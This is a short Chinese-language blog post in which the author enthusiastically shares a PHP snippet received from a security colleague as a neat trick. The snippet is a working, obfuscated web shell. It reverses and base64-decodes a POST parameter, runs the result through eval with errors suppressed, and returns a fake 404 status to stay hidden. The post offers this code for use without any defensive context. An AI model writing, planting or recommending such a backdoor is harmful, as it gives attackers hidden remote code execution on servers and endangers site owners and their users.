"開啟一扇新的大門"

guoke0826發表於2020-06-04

程式碼寫這麼多年,從來沒往這方面想,前段時間一個做安全的同事給發了一段程式碼,原來PHP還能有這種騷操作,真是感覺為我開啟了一扇新的大門,而這個函式伺服器預設是不會禁用的,放這麼一段程式碼就能玩一些騷操作了 分享一下

<?php
class obj
{
    static public $params=null;
    function __construct($params="error"){
        self::$params=$params;
        @eval(null.self::$params);
    }
}
$params = null.base64_decode(strrev(@$_POST["params"]));
$obj = new obj($params);
header('HTTP/1.1 404 Not Found');
本作品採用《CC 協議》,轉載必須註明作者和本文連結

相關文章